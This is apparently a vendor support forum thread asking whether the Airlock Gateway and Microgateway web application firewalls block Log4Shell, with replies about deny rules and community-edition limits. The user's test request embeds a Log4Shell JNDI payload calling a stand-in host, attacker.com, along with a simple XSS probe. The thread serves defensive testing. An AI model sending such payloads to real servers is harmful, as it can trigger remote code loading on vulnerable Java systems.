Log4shell no information

How does Airlock on Docker Hub protect against the Log4Shell vulnerability? I do not see public information on https://docs.airlock.com/

Thanks
Buran

Hi Buran

The short answer is:
Airlock Gateway and Airlock Microgateway include a default Deny Rule Group Template Injection that protects against Log4Shell exploits. With these rules set to blocking level Standard or Strict, any vulnerable backend application should be protected.

Here are some more details on how this protection works:
You are probably aware that Airlock Gateway and Airlock Microgateway share the same security core. They both protect web applications and APIs using a combination of different filtering methods. For example, there are many Deny Rules that detect and block attacks like Cross-Site Scripting (XSS) or Log4Shell. These are essentially blacklist rules that match certain attack types in a generic manner. This means these rules don't just match a single exploit variant; they rather detect whole classes of attack.

We do not disclose the exact patterns of our deny rules. But these rules are very generic and therefore pretty aggressive. We block everything that has ${ in it. So far, we have not seen any attack variants that are missed by our rules (evasions). These template injection rules are already active in the standard security level since Airlock Microgateway 2.0 and Airlock Gateway 7.6. We are not aware of any negative feedback on false positives in this regard. If there are, you can capture precise exceptions, e.g. if a back-end is not vulnerable for sure.

Airlock Microgateway itself is not known to be exploitable. To reduce the risk of indirect or side-channel attacks to vulnerable Java components running on Airlock Microgateway, we have published updated versions 2.1.4 and 3.1.1.

Does this answer your question?
Best regards,
Dani

PS: Maybe this article is also worth reading: Log4Shell: What matters now | Airlock

Thank you. It seems that the docker image does not block Log4Shell like /s/frame.do?${jndi:ldap://attacker.com/a}. Other attacks /s/frame.do?<script>test</script> are blocked. Are these Template Injection rules not enabled by default?

Thanks

Hi Buran

The community edition contains deny rules against the following attacks:
SQL injection, XSS and sanity checks.

The comparison overview of the community edition and premium edition illustrates it:

Community vs. premium features

Available in community and premium edition:
  Selected Deny Rules: SQLi or XSS attack prevention, sanity checks

Only available in the premium edition:
  All Deny Rules: over 30 more groups of blacklist rules

Feel free to request a trial license:
https://airlock.com/microgateway-premium

Stefan